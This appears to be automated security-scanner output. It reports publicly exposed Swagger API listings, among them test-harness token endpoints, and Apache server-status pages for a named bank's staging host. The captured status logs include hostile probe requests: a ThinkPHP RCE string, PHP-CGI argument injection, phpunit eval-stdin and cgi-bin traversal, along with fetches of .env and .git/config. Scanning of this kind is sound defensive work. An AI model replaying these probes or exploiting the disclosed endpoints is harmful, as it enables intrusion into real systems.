Exposing Swagger/OpenAPI documentation is primarily a risk if your API has underlying security flaws, as it gives attackers a precise roadmap to find them.
Those detail every endpoint, parameter, and data model, making it easier to discover and exploit vulnerabilities like broken access control or injection points.
While a perfectly secure API mitigates the danger, protecting your documentation is a critical layer of defense that forces attackers to work without a map.
Severity: info
Fingerprint: 5733ddf49ff49cd1aad035490b926d8f9a07726d6884b6cf2d8b6a10c21da333
Public Swagger UI/API detected at path: /swagger/index.html - sample paths:
GET /shop/getAllDropoff/{fromDate}
GET /shop/getAllShipment/{fromDate}
GET /shop/getShipmentByBarcode/{barcode}
GET /shop/s2s/check/type/{idCollo}
GET /shop/s2s/check/valid/{idCollo}
POST /check/limit
POST /shop/c2c/depotShop
POST /shop/s2s/handling
POST /shop/{partnerId}/{parcelShopId}/c2c/handling
POST /shop/{partnerId}/{parcelShopId}/return/check/{returnId}
POST /shop/{partnerId}/{parcelShopId}/return/handling/{returnId}
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/delivered
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/handling
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/reminder
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/requestDeliveryToShop
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/requestReturn
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/returned
POST /shops/{partnerId}/{parcelShopId}
Severity: info
Fingerprint: 5733ddf49ff49cd1f3d88d6006ee436ac1e178caa85cc408587071f30a8bea46
Public Swagger UI/API detected at path: /swagger/v1/swagger.json - sample paths:
GET /shop/getAllDropoff/{fromDate}
GET /shop/getAllShipment/{fromDate}
GET /shop/getShipmentByBarcode/{barcode}
GET /shop/s2s/check/type/{idCollo}
GET /shop/s2s/check/valid/{idCollo}
POST /check/limit
POST /shop/c2c/depotShop
POST /shop/s2s/handling
POST /shop/{partnerId}/{parcelShopId}/c2c/handling
POST /shop/{partnerId}/{parcelShopId}/return/check/{returnId}
POST /shop/{partnerId}/{parcelShopId}/return/handling/{returnId}
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/delivered
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/handling
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/reminder
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/requestDeliveryToShop
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/requestReturn
POST /shop/{partnerId}/{parcelShopId}/shipmentStatus/returned
POST /shops/{partnerId}/{parcelShopId}
Severity: info
Fingerprint: 5733ddf49ff49cd12ec8532c2ec8532c2ec8532c2ec8532c2ec8532c2ec8532c
Public Swagger UI/API detected at path: /swagger/index.html
Exposing Swagger/OpenAPI documentation is primarily a risk if your API has underlying security flaws, as it gives attackers a precise roadmap to find them.
Those detail every endpoint, parameter, and data model, making it easier to discover and exploit vulnerabilities like broken access control or injection points.
While a perfectly secure API mitigates the danger, protecting your documentation is a critical layer of defense that forces attackers to work without a map.
Severity: info
Fingerprint: 5733ddf49ff49cd1aad0354967364ab4b877937600a4c819823924047b147eb0
Public Swagger UI/API detected at path: /swagger/index.html - sample paths:
GET /.well-known/jwks
GET /Credentials/search
GET /Credentials/{id}
GET /Identities/{id}
GET /authorize
GET /cognito/callback
GET /entitlements/get-entitlements
GET /entitlements/is-entitled
GET /health
GET /health/debug
GET /health/full
GET /login
GET /logout
GET /logout/complete
GET /test-harness
GET /test-harness/echo-token
GET /test-harness/feature-enabled
GET /test-harness/give-me-a-client-token
GET /test-harness/give-me-a-cognito-client-token
GET /test-harness/give-me-a-user-token
GET /test-harness/give-me-an-emulated-cognito-client-token
GET /who-am-i
POST /provisioning/admin-user
POST /provisioning/initialize
POST /provisioning/upgrade-credentials
POST /provisioning/v1/association
POST /provisioning/v1/cognito-user-temp
POST /provisioning/v1/identity
POST /provisioning/v1/oauth-client
POST /provisioning/v1/update-client-properties
POST /test-harness/create-oauth-client
POST /test-harness/create-oauth-client-pki
POST /test-harness/create-oauth-user
POST /test-harness/sign-jwt
POST /token
Severity: info
Fingerprint: 5733ddf49ff49cd1f3d88d60cbed6a97eea5a243c16827c65447458714fe6c0f
Public Swagger UI/API detected at path: /swagger/v1/swagger.json - sample paths:
GET /.well-known/jwks
GET /Credentials/search
GET /Credentials/{id}
GET /Identities/{id}
GET /authorize
GET /cognito/callback
GET /entitlements/get-entitlements
GET /entitlements/is-entitled
GET /health
GET /health/debug
GET /health/full
GET /login
GET /logout
GET /logout/complete
GET /test-harness
GET /test-harness/echo-token
GET /test-harness/feature-enabled
GET /test-harness/give-me-a-client-token
GET /test-harness/give-me-a-cognito-client-token
GET /test-harness/give-me-a-user-token
GET /test-harness/give-me-an-emulated-cognito-client-token
GET /who-am-i
POST /provisioning/admin-user
POST /provisioning/initialize
POST /provisioning/upgrade-credentials
POST /provisioning/v1/association
POST /provisioning/v1/cognito-user-temp
POST /provisioning/v1/identity
POST /provisioning/v1/oauth-client
POST /provisioning/v1/update-client-properties
POST /test-harness/create-oauth-client
POST /test-harness/create-oauth-client-pki
POST /test-harness/create-oauth-user
POST /test-harness/sign-jwt
POST /token
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251f69809ba
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Friday, 09-Jan-2026 08:29:14 CET Restart Time: Friday, 19-Dec-2025 17:59:48 CET Parent Server Config. Generation: 23 Parent Server MPM Generation: 22 Server uptime: 20 days 14 hours 29 minutes 26 seconds Server load: 0.00 0.01 0.00 Total accesses: 39383 - Total Traffic: 245.0 MB - Total Duration: 706333 CPU Usage: u73.47 s71.3 cu135.56 cs38.19 - .0179% CPU load .0221 requests/sec - 144 B/second - 6.4 kB/request - 17.935 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 12136139no0yes00250000 32136140no1yes10240000 Sum201 10490000 ........................._________________________.............. ...........__________W______________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-20-0/0/526. 0.001169499231320.00.001.82 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/545. 0.00116949130670.00.001.64 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-20-0/0/551. 0.001169499923140.00.002.84 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-json/wp/v2/taxonomies?context=edit&per_page=100&_locale 0-20-0/0/518. 0.001169499740710.00.002.05 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-json/wp/v2/wp_pattern_category?context=view&per_page=10 0-20-0/0/521. 0.00116949030720.00.001.52 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/uploads/2025/12/7357ce90f95eb8fe8b265017caf3a6d 0-20-0/0/546. 0.0011694919066440.00.001.95 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/559. 0.0011694910329510.00.002.38 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/518. 0.001169499220490.00.001.64 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/549. 0.00116949053840.00.002.54 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/uploads/2025/12/image-296-1-175x300.png HTTP/1. 0-20-0/0/548. 0.0011694961330600.00.003.02 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/527. 0.001169492018140.00.002.15 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-20-0/0/556. 0.00116949140680.00.001.86 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/plugins/wordpress-seo/js/dist/externals/reactHe 0-20-0/0/541. 0.00116949140860.00.001.74 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-20-0/0/539. 0.001169493563040.00.003.19 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/plugins/wordpress-seo/js/dist/externals/uiLibra 0-20-0/0/541. 0.0011694911140580.00.002.78 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-json/wp/v2/users/2?context=view&_fields=id%2Cname&_loca 0-20-0/0/538. 0.001169490107650.00.002.57 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/uploads/2025/12/Vector-6.svg HTTP/1.1 0-20-0/0/541. 0.00116949040990.00.002.55 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/plugins/wordpress-seo/css/dist/dashboard-2660.c 0-20-0/0/540. 0.001169499672560.00.001.63 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/544. 0.00116949028250.00.001.96 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/uploads/2025/12/text-image-300x200.jpg HTTP/1.1 0-20-0/0/558. 0.00116949147360.00.002.64 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-20-0/0/553. 0.001169492644080.00.002.29 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-content/plugins/advanced-custom-fields-pro/assets/inc/s 0-20-0/0/535. 0.00116949113138030.00.001.87 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/533. 0.0011694919735370.00.001.64 127.0.0.1http/1.1central-landing.projet-client.cPOST /wp-admin/admin-ajax.php HTTP/1.1 0-20-0/0/548. 0.00116949147840.00.002.51 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-includes/js/dist/block-directory.min.js?ver=55bdef7bd31 0-20-0/0/546. 0.0011694911351650.00.003.28 127.0.0.1http/1.1central-landing.projet-client.cGET /wp-json/wp/v2/templates/lookup?slug=front-page&_locale=use 1-2221361390/5/671_ 0.5823271110990.00.014.16 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/4/686_ 0.5323270124160.00.015.97 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-2221361390/6/678_ 0.662240194690.00.014.93 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/5/712_ 0.5922355180980.00.014.69 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/4/687_ 0.5322351103470.00.017.96 127.0.0.1http/1.1127.0.1.1:8080GET /json/ HTTP/1.1 1-2221361390/5/707_ 0.69113220159040.00.015.14 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/6/679_ 0.6623325173310.00.013.27 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/4/702_ 0.5225355188330.00.015.58 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/4/681_ 0.5725351151530.00.014.18 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/5/692_ 0.6425403106170.00.013.22 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/3/705_ 0.5235271163390.00.015.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/4/680_ 0.5735277144840.00.014.85 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/6/711_ 0.63353210158720.00.024.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/3/673_ 0.5138274153830.00.003.41 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/3/704_ 0.5638273149570.00.014.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/7/707_ 0.62383215151970.00.014.45 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/4/684_ 0.502091120930.00.013.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/3/714_ 0.562098134010.00.014.50 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/8/663_ 0.692142159300.00.024.25 127.0.0.1http/1.1127.0.1.1:8080GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 1-2221361390/4/691_ 0.505354114910.00.014.37 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-2221361390/3/706_ 0.545351135870.00.015.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2221361390/7/657_ 0.695400154470.00.026.18 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-2221361390/5/689_ 0.695410158300.00.014.04 127.0.0.1http/1.1127.0.1.1:80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25172301e12
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Friday, 02-Jan-2026 14:58:55 CET Restart Time: Friday, 19-Dec-2025 17:59:48 CET Parent Server Config. Generation: 16 Parent Server MPM Generation: 15 Server uptime: 13 days 20 hours 59 minutes 7 seconds Server load: 0.00 0.00 0.00 Total accesses: 23531 - Total Traffic: 79.0 MB - Total Duration: 167726 CPU Usage: u52.86 s49.18 cu82.46 cs24.77 - .0175% CPU load .0196 requests/sec - 69 B/second - 3521 B/request - 7.12787 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 01073891no1yes10240010 21073817no0yes00250000 Sum201 10490010 ______________W__________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1510738910/26/484_ 3.0915022730.00.031.60 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 0-1510738910/31/498_ 3.0914019070.00.051.32 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 0-1510738910/26/495_ 3.0913013220.00.041.37 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 0-1510738910/27/476_ 3.0912021280.00.041.47 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 0-1510738910/30/472_ 3.0911020180.00.051.20 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 0-1510738910/30/493_ 3.0910055460.00.041.42 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 0-1510738910/30/502_ 3.099016530.00.041.45 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-1510738910/31/469_ 3.098011870.00.051.22 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-1510738910/33/497_ 3.107036120.00.051.61 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-1510738910/30/495_ 3.106016330.00.041.30 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-1510738910/30/478_ 3.104011740.00.041.78 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-1510738910/33/503_ 3.103023370.00.051.46 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-1510738910/28/482_ 3.102028170.00.041.26 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-1510738910/28/492_ 3.100054280.00.041.73 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-15107389125/30/502W 2.970030270.00.051.80 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-1510738910/29/479_ 3.0919099910.00.051.43 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 0-1510738910/28/491_ 3.0922132310.00.051.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-1510738910/30/490_ 3.0920064480.00.041.42 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 0-1510738910/33/499_ 3.0920023200.00.051.25 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 0-1510738910/28/508_ 3.0920035820.00.041.40 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 0-1510738910/26/498_ 3.0920034850.00.031.68 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 0-1510738910/32/487_ 3.09200130590.00.051.46 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 0-1510738910/27/484_ 3.0917022400.00.041.34 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 0-1510738910/32/500_ 3.0917035110.00.051.91 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 0-1510738910/29/486_ 3.0916038480.00.051.55 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-14-0/0/410. 0.0053934628700.00.001.29 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-14-0/0/388. 0.0053934024460.00.001.76 127.0.0.1http/1.1127.0.1.1:8080GET /public/index.php?s=/index/\\think\\app/invokefunction&functi 1-14-0/0/399. 0.0053934712550.00.001.40 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-14-0/0/406. 0.0053934042000.00.001.58 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/gateway/routes HTTP/1.1 1-14-0/0/406. 0.0053934014060.00.004.61 127.0.0.1http/1.1127.0.1.1:8080GET /containers/json HTTP/1.1 1-14-0/0/402. 0.00539341846870.00.001.87 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 1-14-0/0/394. 0.0053934123180.00.001.30 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-14-0/0/405. 0.0053934760810.00.001.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-14-0/0/408. 0.0053934532600.00.001.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-14-0/0/398. 0.0053934425190.00.001.77 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-14-0/0/412. 0.0053934116520.00.001.41 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-14-0/0/405. 0.0053934524820.00.001.30 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-14-0/0/413. 0.0053934213180.00.001.62 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-14-0/0/387. 0.0053934243680.00.001.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-14-0/0/395. 0.0053934022570.00.001.27 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-14-0/0/399. 0.0053934715540.00.001.42 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-14-0/0/398. 0.0053934038380.00.001.75 127.0.0.1http/1.1127.0.1.1:8080POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 1-14-0/0/411. 0.0053934020130.00.001.28 127.0.0.1http/1.1127.0.1.1:8080POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp: 1-14-0/0/407. 0.0053934042600.00.001.51 127.0.0.1http/1.1127.0.1.1:8080POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 1-14-0/0/398. 0.0053934025100.00.001.36 127.0.0.1http/1.1127.0.1.1:8080GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 1-14-0/0/405. 0.0053934021600.00.001.69 127.0.0.1http/1.1127.0.1.1:8080GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1 1-14-0/0/382. 0.0053934035050.00.001.54 127.0.0.1http/1.1127.0.1.1:8080GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1 1-14-0/0/415. 0.0053934041720.00.001.37 127.0.0.1http/1.1127.0.1.1:8080GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 1-14-0/0/402. 0.0053934037720.00.001.23 127.0.0.1http/1.1127.0.1.1:8080GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1 1-14-0/0/396. 0.0053934031380.00.001.48 127.0.0.1http/1.1127.0.1.1:8080POST /?%ADd+allow_url_i
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251823f28d1
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Friday, 26-Dec-2025 16:33:24 CET Restart Time: Friday, 19-Dec-2025 17:59:48 CET Parent Server Config. Generation: 9 Parent Server MPM Generation: 8 Server uptime: 6 days 22 hours 33 minutes 36 seconds Server load: 0.00 0.00 0.00 Total accesses: 13091 - Total Traffic: 61.3 MB - Total Duration: 137574 CPU Usage: u28.19 s25.28 cu42.88 cs12.32 - .0181% CPU load .0218 requests/sec - 107 B/second - 4909 B/request - 10.5091 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 036355no0yes00250000 136356no1yes10240010 Sum201 10490010 ____________________________________________W_____.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8363550/23/269_ 3.132751016860.00.041.30 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-8363550/21/279_ 3.13274013610.00.040.97 127.0.0.1http/1.1127.0.1.1:8080GET /login.action HTTP/1.1 0-8363550/28/280_ 3.1327307800.00.041.04 127.0.0.1http/1.1127.0.1.1:8080GET /_all_dbs HTTP/1.1 0-8363550/22/268_ 3.13272016160.00.041.15 127.0.0.1http/1.1127.0.1.1:8080GET /.DS_Store HTTP/1.1 0-8363550/22/263_ 3.13271114210.00.030.89 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-8363550/28/277_ 3.13269049600.00.051.08 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 0-8363550/24/279_ 3.13268010880.00.041.10 127.0.0.1http/1.1127.0.1.1:8080GET /s/834323e24333e2230313e2430313/_/;/META-INF/maven/com.atla 0-8363550/26/258_ 3.1326706560.00.040.89 127.0.0.1http/1.1127.0.1.1:8080GET /config.json HTTP/1.1 0-8363550/26/281_ 3.13266030320.00.041.30 127.0.0.1http/1.1127.0.1.1:8080GET /telescope/requests HTTP/1.1 0-8363550/24/278_ 3.13265010310.00.040.97 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 0-8363550/24/263_ 3.1326417230.00.041.43 127.0.0.1http/1.1127.0.1.1:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-8363550/27/283_ 3.10259017460.00.051.10 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 0-8363550/23/265_ 3.10259023270.00.030.92 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 0-8363550/23/269_ 3.14180248150.00.031.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-8363550/29/285_ 3.12276024390.00.061.45 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-8363550/22/266_ 3.12277093980.00.031.11 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-8363550/23/273_ 3.12278028190.00.041.18 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-8363550/29/275_ 3.12279059630.00.061.09 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-8363550/20/262_ 3.12281017370.00.030.87 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-8363550/26/294_ 3.10175029500.00.051.08 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 0-8363550/27/282_ 3.10175029760.00.041.33 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 0-8363550/28/276_ 3.15841125060.00.041.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-8363550/25/268_ 3.1079015990.00.041.03 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-8363550/29/278_ 3.1179029250.00.041.57 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-8363550/22/273_ 3.11282032140.00.031.23 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-8363560/17/260_ 2.1220023880.00.031.03 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 1-8363560/14/242_ 2.136019590.00.021.48 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-8363560/15/244_ 2.122007420.00.031.08 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-8363560/13/255_ 2.1216037670.00.021.30 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-8363560/12/249_ 2.121909110.00.024.30 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-8363560/10/253_ 2.1220042530.00.021.59 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-8363560/14/249_ 2.1310017930.00.021.03 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-8363560/16/257_ 2.1221056170.00.021.17 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-8363560/15/256_ 2.1314028090.00.030.97 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-8363560/13/242_ 2.1218020560.00.021.46 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-8363560/14/251_ 2.133010940.00.041.12 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-8363560/15/253_ 2.1217020610.00.030.99 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-8363560/15/263_ 2.13308570.00.031.33 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-8363560/12/241_ 2.1314138940.00.021.09 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-8363560/12/241_ 2.141216870.00.020.99 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-8363560/14/255_ 2.1313010670.00.021.17 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-8363560/13/248_ 2.1312032480.00.021.47 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-8363560/14/262_ 2.141014900.00.041.01 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-8363560/15/245_ 2.1311037390.00.031.16 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-83635625/14/248W 1.910020970.00.031.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-8363560/14/246_ 2.139016160.00.031.40 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-8363560/10/235_ 2.1122930310.00.021.30 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-8363560/17/265_ 2.138137870.00.041.06 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-8363560/15/242_ 2.1121031820.00.040.91 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 1-8363560/14/245_ 2.137026390.00.021.16 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 